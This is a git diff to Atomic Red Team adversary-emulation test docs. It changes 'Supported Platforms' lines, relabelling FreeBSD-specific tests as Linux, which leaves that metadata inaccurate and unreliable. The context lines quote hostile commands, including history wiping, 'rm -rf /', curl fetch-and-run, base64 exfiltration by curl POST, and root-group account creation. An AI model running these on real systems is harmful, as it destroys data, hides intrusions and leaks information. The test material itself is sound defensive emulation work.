@@ -200,7 +200,7 @@ cat /dev/null > ~/.bash_history
 ## Atomic Test #6 - Clear sh history (cat dev/null) Clears sh history via cat /dev/null
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc
@@ -256,7 +256,7 @@ ln -sf /dev/null ~/.bash_history
 ## Atomic Test #8 - Clear sh history (ln dev/null) Clears sh history via a symlink to /dev/null
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 3126aa7a-8768-456f-ae05-6ab2d4accfdd
@@ -312,7 +312,7 @@ truncate -s0 ~/.bash_history
 ## Atomic Test #10 - Clear sh history (truncate) Clears sh history via truncate
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** e14d9bb0-c853-4503-aa89-739d5c0a5818
@@ -370,7 +370,7 @@ history -c
 ## Atomic Test #12 - Clear history of a bunch of shells (freebsd) Clears the history of a bunch of different shell types by setting the history size to zero
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0
@@ -514,7 +514,7 @@ echo -e 'pwd101!\npwd101!' | passwd testuser1
 ## Atomic Test #16 - Disable sh History Logging with SSH -T (freebsd) Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** ec3f2306-dd19-4c4b-bed7-92d20e9b1dee
diff --git a/atomics/T1070.004/T1070.004.md b/atomics/T1070.004/T1070.004.md
index 00c1b42b6f..87ea4a1f9e 100644
--- a/atomics/T1070.004/T1070.004.md
+++ b/atomics/T1070.004/T1070.004.md
@@ -34,7 +34,7 @@ There are tools available from the host operating system to perform cleanup, but
 ## Atomic Test #1 - Delete a single file - FreeBSD/Linux/macOS Delete a single file from the temporary directory
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** 562d737f-2fc6-4b09-8c2a-7f8ff0828480
@@ -84,7 +84,7 @@ mkdir -p #{parent_folder} && touch #{file_to_delete}
 ## Atomic Test #2 - Delete an entire folder - FreeBSD/Linux/macOS Recursively delete the temporary directory and all files contained within it
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** a415f17e-ce8d-4ce2-a8b4-83b674e7017e
@@ -372,7 +372,7 @@ rm -rf / --no-preserve-root > /dev/null 2> /dev/null
 ## Atomic Test #9 - Delete Filesystem - FreeBSD This test deletes the entire root filesystem of a FreeBSD system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
-**Supported Platforms:** Freebsd
+**Supported Platforms:** Linux
 **auto_generated_guid:** b5aaca7e-a48f-4f1b-8f0f-a27b8f516608
diff --git a/atomics/T1070.006/T1070.006.md b/atomics/T1070.006/T1070.006.md
index 71c6b526ed..6205e0ecb1 100644
--- a/atomics/T1070.006/T1070.006.md
+++ b/atomics/T1070.006/T1070.006.md
@@ -28,7 +28,7 @@ Timestomping may be used along with file name [Masquerading](https://attack.mitr
 ## Atomic Test #1 - Set a file's access timestamp Stomps on the access timestamp of a file
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** 5f9113d5-ed75-47ed-ba23-ea3573d05810
@@ -77,7 +77,7 @@ echo 'T1070.006 file access timestomp test' > #{target_filename}
 ## Atomic Test #2 - Set a file's modification timestamp Stomps on the modification timestamp of a file
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** 20ef1523-8758-4898-b5a2-d026cc3d2c52
@@ -129,7 +129,7 @@ Stomps on the create timestamp of a file
 Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution.
-**Supported Platforms:** Freebsd, Linux, macOS
+**Supported Platforms:** Linux, macOS
 **auto_generated_guid:** 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b
@@ -172,7 +172,7 @@ Modifies the `modify` and `access` timestamps using the timestamps of a specifie This technique was used by the threat actor Rocke during the compromise of Linux web servers. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 631ea661-d661-44b0-abdb-7a7f3fc08e50 diff --git a/atomics/T1071.001/T1071.001.md b/atomics/T1071.001/T1071.001.md index a8ea071d34..0782d04c9c 100644 --- a/atomics/T1071.001/T1071.001.md +++ b/atomics/T1071.001/T1071.001.md @@ -115,7 +115,7 @@ Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" This test simulates an infected host beaconing to command and control. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 diff --git a/atomics/T1074.001/T1074.001.md b/atomics/T1074.001/T1074.001.md index 2163e49e78..81abcf9b16 100644 --- a/atomics/T1074.001/T1074.001.md +++ b/atomics/T1074.001/T1074.001.md @@ -91,7 +91,7 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato ## Atomic Test #3 - Stage data from Discovery.sh (freebsd) Utilize curl to download discovery.sh and execute a basic information gathering shell script -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 4fca7b49-379d-4493-8890-d6297750fa46 diff --git a/atomics/T1078.003/T1078.003.md b/atomics/T1078.003/T1078.003.md index ce3558504d..fefdeb4f06 100644 --- a/atomics/T1078.003/T1078.003.md +++ b/atomics/T1078.003/T1078.003.md 
@@ -310,7 +310,7 @@ userdel -r art ## Atomic Test #9 - Create local account (FreeBSD) An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 95158cc9-8f6d-4889-9531-9be3f7f095e0 @@ -389,7 +389,7 @@ A system administrator may have locked and expired a user account rather than de In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 09e3380a-fae5-4255-8b19-9950be0252cf @@ -469,7 +469,7 @@ cat /etc/passwd |grep nobody ## Atomic Test #13 - Login as nobody (freebsd) An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 16f6374f-7600-459a-9b16-6a88fd96d310 diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index 277ec91af8..40abc14cfa 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -134,7 +134,7 @@ ls -al /Applications ## Atomic Test #3 - List OS Information Identify System Info -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** cccb070c-df86-4216-a5bc-9fb60c74e27c 
@@ -244,7 +244,7 @@ sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc" ## Atomic Test #6 - FreeBSD VM Check via Kernel Modules Identify virtual machine host kernel modules. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** eefe6a49-d88b-41d8-8fc2-b46822da90d3 @@ -301,7 +301,7 @@ hostname ## Atomic Test #8 - Hostname Discovery Identify system hostname for FreeBSD, Linux and macOS systems. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 486e88ea-4f56-470f-9b57-3f4d73f39133 @@ -433,7 +433,7 @@ set ## Atomic Test #12 - Environment variables discovery on freebsd, macos and linux Identify all environment variables. Upon execution, environments variables and your path info will be displayed. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** fcbdd43f-f4ad-42d5-98f3-0218097e2720 @@ -904,7 +904,7 @@ grep vmw /proc/modules ## Atomic Test #26 - FreeBSD List Kernel Modules Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 4947897f-643a-4b75-b3f5-bed6885749f6 diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md index c72492162d..f2624d2517 100644 --- a/atomics/T1083/T1083.md +++ b/atomics/T1083/T1083.md @@ -103,7 +103,7 @@ http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/ https://perishablepress.com/list-files-folders-recursively-terminal/ -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** ffc8b249-372a-4b74-adcd-e4c0430842de 
@@ -147,7 +147,7 @@ rm #{output_file} ## Atomic Test #4 - Nix File and Directory Discovery 2 Find or discover files on the file system -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 13c5e1ae-605b-46c4-a79f-db28c77ff24e diff --git a/atomics/T1087.001/T1087.001.md b/atomics/T1087.001/T1087.001.md index ef9b2193f6..a274c99d06 100644 --- a/atomics/T1087.001/T1087.001.md +++ b/atomics/T1087.001/T1087.001.md @@ -34,7 +34,7 @@ Commands such as net user and net localgroup of the [N ## Atomic Test #1 - Enumerate all accounts (Local) Enumerate all accounts by copying /etc/passwd to another file -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** f8aab3dd-5990-4bf8-b8ab-2226c951696f @@ -72,7 +72,7 @@ rm -f #{output_file} ## Atomic Test #2 - View sudoers access (requires root) -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** fed9be70-0186-4bde-9f8a-20945f9370c2 @@ -111,7 +111,7 @@ rm -f #{output_file} ## Atomic Test #3 - View accounts with UID 0 View accounts with UID 0 -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** c955a599-3653-4fe5-b631-f11c00eb0397 @@ -150,7 +150,7 @@ rm -f #{output_file} 2>/dev/null ## Atomic Test #4 - List opened files by user List opened files by user -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb @@ -240,7 +240,7 @@ sudo apt-get install login; exit 1; ## Atomic Test #6 - Show if a user account has ever logged in remotely (freebsd) Show if a user account has ever logged in remotely -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 0f73418f-d680-4383-8a24-87bc97fe4e35 
@@ -278,7 +278,7 @@ rm -f #{output_file} ## Atomic Test #7 - Enumerate users and groups Utilize groups and id to enumerate users and groups -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** e6f36545-dc1e-47f0-9f48-7f730f54a02e diff --git a/atomics/T1090.001/T1090.001.md b/atomics/T1090.001/T1090.001.md index a8c6aceeec..419d0cc25b 100644 --- a/atomics/T1090.001/T1090.001.md +++ b/atomics/T1090.001/T1090.001.md @@ -20,7 +20,7 @@ Enable traffic redirection. Note that this test may conflict with pre-existing system configuration. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 0ac21132-4485-4212-a681-349e8a6637cd diff --git a/atomics/T1090.003/T1090.003.md b/atomics/T1090.003/T1090.003.md index 683b588968..20ff12f682 100644 --- a/atomics/T1090.003/T1090.003.md +++ b/atomics/T1090.003/T1090.003.md @@ -237,7 +237,7 @@ brew install tor This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality. Upon successful execution, the tor proxy service will be launched. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 550ec67d-a99e-408b-816a-689271b27d2a diff --git a/atomics/T1098.004/T1098.004.md b/atomics/T1098.004/T1098.004.md index a5d75397b6..3e2781729d 100644 --- a/atomics/T1098.004/T1098.004.md +++ b/atomics/T1098.004/T1098.004.md @@ -19,7 +19,7 @@ SSH keys can also be added to accounts on network devices, such as with the `ip Modify contents of /.ssh/authorized_keys to maintain persistence on victim host. If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 342cc723-127c-4d3a-8292-9c0c6b4ecadc 
diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index 5ca8c2b71f..2e4f11e933 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -72,7 +72,7 @@ On Windows, adversaries may use various utilities to download tools, such as `co ## Atomic Test #1 - rsync remote file copy (push) Utilize rsync to perform a remote file copy (push) -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 0fc6e977-cb12-44f6-b263-2824ba917409 @@ -120,7 +120,7 @@ if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi ## Atomic Test #2 - rsync remote file copy (pull) Utilize rsync to perform a remote file copy (pull) -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 3180f7d5-52c0-4493-9ea0-e3431a84773f @@ -168,7 +168,7 @@ if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi ## Atomic Test #3 - scp remote file copy (push) Utilize scp to perform a remote file copy (push) -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 83a49600-222b-4866-80a0-37736ad29344 @@ -204,7 +204,7 @@ scp #{local_file} #{username}@#{remote_host}:#{remote_path} ## Atomic Test #4 - scp remote file copy (pull) Utilize scp to perform a remote file copy (pull) -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** b9d22b9a-9778-4426-abf0-568ea64e9c33 @@ -240,7 +240,7 @@ scp #{username}@#{remote_host}:#{remote_file} #{local_path} ## Atomic Test #5 - sftp remote file copy (push) Utilize sftp to perform a remote file copy (push) -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** f564c297-7978-4aa9-b37a-d90477feea4e 
@@ -276,7 +276,7 @@ sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}' ## Atomic Test #6 - sftp remote file copy (pull) Utilize sftp to perform a remote file copy (pull) -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 0139dba1-f391-405e-a4f5-f3989f2c88ef @@ -597,7 +597,7 @@ Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually ## Atomic Test #14 - whois file download Download a remote file using the whois utility -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** c99a829f-0bb8-4187-b2c6-d47d1df74cab diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md index 5e5dd6d534..672281b661 100644 --- a/atomics/T1110.001/T1110.001.md +++ b/atomics/T1110.001/T1110.001.md @@ -379,7 +379,7 @@ An adversary may find themselves on a box (e.g. via ssh key auth, with no passwo This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** abcde488-e083-4ee7-bc85-a5684edd7541 diff --git a/atomics/T1110.004/T1110.004.md b/atomics/T1110.004/T1110.004.md index c7cd6d6d45..c086d847b6 100644 --- a/atomics/T1110.004/T1110.004.md +++ b/atomics/T1110.004/T1110.004.md @@ -130,7 +130,7 @@ brew install hudochenkov/sshpass/sshpass ## Atomic Test #3 - SSH Credential Stuffing From FreeBSD Using username,password combination from a password dump to login over SSH. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** a790d50e-7ebf-48de-8daa-d9367e0911d4 diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md index 79c158b558..71a7d61321 100644 --- a/atomics/T1113/T1113.md +++ b/atomics/T1113/T1113.md 
@@ -153,7 +153,7 @@ sudo #{package_installer} ## Atomic Test #4 - X Windows Capture (freebsd) Use xwd command to collect a full desktop screenshot and review file with xwud -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 562f3bc2-74e8-46c5-95c7-0e01f9ccc65c @@ -253,7 +253,7 @@ sudo apt install graphicsmagick-imagemagick-compat ## Atomic Test #6 - Capture Linux Desktop using Import Tool (freebsd) Use import command from ImageMagick to collect a full desktop screenshot -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 18397d87-38aa-4443-a098-8a48a8ca5d8d diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md index 2e66b5d2ff..89a1eb3f51 100644 --- a/atomics/T1124/T1124.md +++ b/atomics/T1124/T1124.md @@ -88,7 +88,7 @@ Get-Date ## Atomic Test #3 - System Time Discovery in FreeBSD/macOS Identify system time. Upon execution, the local computer system time and timezone will be displayed. -**Supported Platforms:** Freebsd, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** f449c933-0891-407f-821e-7916a21a1a6f diff --git a/atomics/T1132.001/T1132.001.md b/atomics/T1132.001/T1132.001.md index c27b313488..97f7a76372 100644 --- a/atomics/T1132.001/T1132.001.md +++ b/atomics/T1132.001/T1132.001.md @@ -51,7 +51,7 @@ curl -XPOST #{base64_data}.#{destination_url} ## Atomic Test #2 - Base64 Encoded data (freebsd) Utilizing a common technique for posting base64 encoded data. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 2d97c626-7652-449e-a986-b02d9051c298 diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index ce4123402c..af9745404d 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md 
@@ -113,7 +113,7 @@ sudo #{package_installer} ## Atomic Test #3 - Network Share Discovery - FreeBSD Network Share Discovery using smbstatus -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 77e468a6-3e5c-45a1-9948-c4b5603747cb diff --git a/atomics/T1136.001/T1136.001.md b/atomics/T1136.001/T1136.001.md index 091130ce39..6f0f01a11b 100644 --- a/atomics/T1136.001/T1136.001.md +++ b/atomics/T1136.001/T1136.001.md @@ -65,7 +65,7 @@ userdel #{username} ## Atomic Test #2 - Create a user account on a FreeBSD system Create a user via pw -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** a39ee1bc-b8c1-4331-8e5f-1859eb408518 @@ -261,7 +261,7 @@ userdel #{username} ## Atomic Test #7 - Create a new user in FreeBSD with `root` GID. Creates a new user in FreeBSD and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** d141afeb-d2bc-4934-8dd5-b7dba0f9f67a diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md index 9607fe4162..dc5bb861ca 100644 --- a/atomics/T1140/T1140.md +++ b/atomics/T1140/T1140.md @@ -115,7 +115,7 @@ del %temp%\T1140_calc2_decoded.exe >nul 2>&1 ## Atomic Test #3 - Base64 decoding with Python Use Python to decode a base64-encoded text string and echo it to the console -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 356dc0e8-684f-4428-bb94-9313998ad608 @@ -167,7 +167,7 @@ echo "Please install Python 3" ## Atomic Test #4 - Base64 decoding with Perl Use Perl to decode a base64-encoded text string and echo it to the console -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 6604d964-b9f6-4d4b-8ce8-499829a14d0a 
@@ -258,7 +258,7 @@ bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}" ## Atomic Test #6 - Base64 decoding with shell utilities (freebsd) Use common shell utilities to decode a base64-encoded text string and echo it to the console -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** b6097712-c42e-4174-b8f2-4b1e1a5bbb3d @@ -299,7 +299,7 @@ echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | b64decode -r ## Atomic Test #7 - FreeBSD b64encode Shebang in CLI Using b64decode shell scripts that have Shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 18ee2002-66e8-4518-87c5-c0ec9c8299ac @@ -350,7 +350,7 @@ echo "please install b64decode" ## Atomic Test #8 - Hex decoding with shell utilities Use common shell utilities to decode a hex-encoded text string and echo it to the console -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 005943f9-8dd5-4349-8b46-0313c0a9f973 diff --git a/atomics/T1176/T1176.md b/atomics/T1176/T1176.md index 709890a64d..285d29c85b 100644 --- a/atomics/T1176/T1176.md +++ b/atomics/T1176/T1176.md 
@@ -28,7 +28,7 @@ There have also been instances of botnets using a persistent backdoor through ma ## Atomic Test #1 - Chrome/Chromium (Developer Mode) Turn on Chrome/Chromium developer mode and Load Extension found in the src directory -**Supported Platforms:** Freebsd, Linux, Windows, macOS +**Supported Platforms:** Linux, Windows, macOS **auto_generated_guid:** 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 @@ -58,7 +58,7 @@ tick 'Developer Mode'. ## Atomic Test #2 - Chrome/Chromium (Chrome Web Store) Install the "Minimum Viable Malicious Extension" Chrome extension -**Supported Platforms:** Freebsd, Linux, Windows, macOS +**Supported Platforms:** Linux, Windows, macOS **auto_generated_guid:** 4c83940d-8ca5-4bb2-8100-f46dc914bc3f @@ -85,7 +85,7 @@ in Chrome ## Atomic Test #3 - Firefox Create a file called test.wma, with the duration of 30 seconds -**Supported Platforms:** Freebsd, Linux, Windows, macOS +**Supported Platforms:** Linux, Windows, macOS **auto_generated_guid:** cb790029-17e6-4c43-b96f-002ce5f10938 diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md index ccaa7f00a9..230ac5e859 100644 --- a/atomics/T1201/T1201.md +++ b/atomics/T1201/T1201.md @@ -66,7 +66,7 @@ cat /etc/pam.d/common-password ## Atomic Test #2 - Examine password complexity policy - FreeBSD Lists the password complexity policy to console on FreeBSD. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** a7893624-a3d7-4aed-9676-80498f31820f diff --git a/atomics/T1217/T1217.md b/atomics/T1217/T1217.md index f702b511f7..02df80778f 100644 --- a/atomics/T1217/T1217.md +++ b/atomics/T1217/T1217.md 
@@ -32,7 +32,7 @@ Specific storage locations vary based on platform and/or application, but browse ## Atomic Test #1 - List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux Searches for Mozilla Firefox's places.sqlite file (on FreeBSD or Linux distributions) that contains bookmarks and lists any found instances to a text file. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 3a41f169-a5ab-407f-9269-abafdb5da6c2 @@ -146,7 +146,7 @@ rm -f #{output_file} 2>/dev/null ## Atomic Test #4 - List Google Chromium Bookmark JSON Files on FreeBSD Searches for Google Chromium's Bookmark file (on FreeBSD) that contains bookmarks in JSON format and lists any found instances to a text file. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 88ca025b-3040-44eb-9168-bd8af22b82fa diff --git a/atomics/T1222.002/T1222.002.md b/atomics/T1222.002/T1222.002.md index 8a76148364..2de8de06cb 100644 --- a/atomics/T1222.002/T1222.002.md +++ b/atomics/T1222.002/T1222.002.md @@ -42,7 +42,7 @@ Adversarial may use these commands to make themselves the owner of files and dir ## Atomic Test #1 - chmod - Change file or folder mode (numeric mode) Changes a file or folder's permissions using chmod and a specified numeric mode. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 34ca1464-de9d-40c6-8c77-690adf36a135 @@ -76,7 +76,7 @@ chmod #{numeric_mode} #{file_or_folder} ## Atomic Test #2 - chmod - Change file or folder mode (symbolic mode) Changes a file or folder's permissions using chmod and a specified symbolic mode. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** fc9d6695-d022-4a80-91b1-381f5c35aff3 
@@ -110,7 +110,7 @@ chmod #{symbolic_mode} #{file_or_folder} ## Atomic Test #3 - chmod - Change file or folder mode (numeric mode) recursively Changes a file or folder's permissions recursively using chmod and a specified numeric mode. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** ea79f937-4a4d-4348-ace6-9916aec453a4 @@ -144,7 +144,7 @@ chmod -R #{numeric_mode} #{file_or_folder} ## Atomic Test #4 - chmod - Change file or folder mode (symbolic mode) recursively Changes a file or folder's permissions recursively using chmod and a specified symbolic mode. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 0451125c-b5f6-488f-993b-5a32b09f7d8f @@ -248,7 +248,7 @@ chown -R #{owner}:#{group} #{file_or_folder} ## Atomic Test #7 - chown - Change file or folder mode ownership only Changes a file or folder's ownership only using chown. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 967ba79d-f184-4e0e-8d09-6362b3162e99 @@ -351,7 +351,7 @@ chattr -i #{file_to_modify} Remove's a file's `immutable` attribute using `chflags`. This technique was used by the threat actor Rocke during the compromise of Linux web servers. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 60eee3ea-2ebd-453b-a666-c52ce08d2709 @@ -432,7 +432,7 @@ gcc #{source_file} -o #{compiled_file} ## Atomic Test #12 - Chmod through c script (freebsd) chmods a file using a c script -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** da40b5fe-3098-4b3b-a410-ff177e49ee2e @@ -524,7 +524,7 @@ gcc #{source_file} -o #{compiled_file} ## Atomic Test #14 - Chown through c script (freebsd) chowns a file to root using a c script -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** eb577a19-b730-4918-9b03-c5edcf51dc4e 
diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md index 4bf73aa283..3313bfc479 100644 --- a/atomics/T1485/T1485.md +++ b/atomics/T1485/T1485.md @@ -76,7 +76,7 @@ Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\SDelete.zip" -Force Overwrites and deletes a file using DD. To stop the test, break the command with CTRL/CMD+C. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 38deee99-fd65-4031-bec8-bfa4f9f26146 diff --git a/atomics/T1486/T1486.md b/atomics/T1486/T1486.md index 7ae1d739f1..bb7bca004a 100644 --- a/atomics/T1486/T1486.md +++ b/atomics/T1486/T1486.md @@ -32,7 +32,7 @@ In cloud environments, storage objects within compromised accounts may also be e ## Atomic Test #1 - Encrypt files using gpg (FreeBSD/Linux) Uses gpg to encrypt a file -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 7b8ce084-3922-4618-8d22-95f996173765 @@ -84,7 +84,7 @@ which_gpg=`which gpg` ## Atomic Test #2 - Encrypt files using 7z (FreeBSD/Linux) Uses 7z to encrypt a file -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 53e6735a-4727-44cc-b35b-237682a151ad @@ -136,7 +136,7 @@ which_7z=`which 7z` ## Atomic Test #3 - Encrypt files using ccrypt (FreeBSD/Linux) Attempts to encrypt data on target systems as root to simulate an inturruption authentication to target system. If root permissions are not available then attempts to encrypt data within user's home directory. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 08cbf59f-85da-4369-a5f4-049cffd7709f 
@@ -190,7 +190,7 @@ if [ $USER == "root" ]; then cp #{root_input_file_path} #{cped_file_path}; else ## Atomic Test #4 - Encrypt files using openssl (FreeBSD/Linux) Uses openssl to encrypt a file -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 142752dc-ca71-443b-9359-cf6f497315f1 diff --git a/atomics/T1496/T1496.md b/atomics/T1496/T1496.md index 66dfd4f1a7..eab432f273 100644 --- a/atomics/T1496/T1496.md +++ b/atomics/T1496/T1496.md @@ -19,7 +19,7 @@ Adversaries may also use malware that leverages a system's network bandwidth as This test simulates a high CPU load as you might observe during cryptojacking attacks. End the test by using CTRL/CMD+C to break. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 904a5a0e-fb02-490d-9f8d-0e256eb37549 diff --git a/atomics/T1497.001/T1497.001.md b/atomics/T1497.001/T1497.001.md index eb85c3979f..8ef21e3dc6 100644 --- a/atomics/T1497.001/T1497.001.md +++ 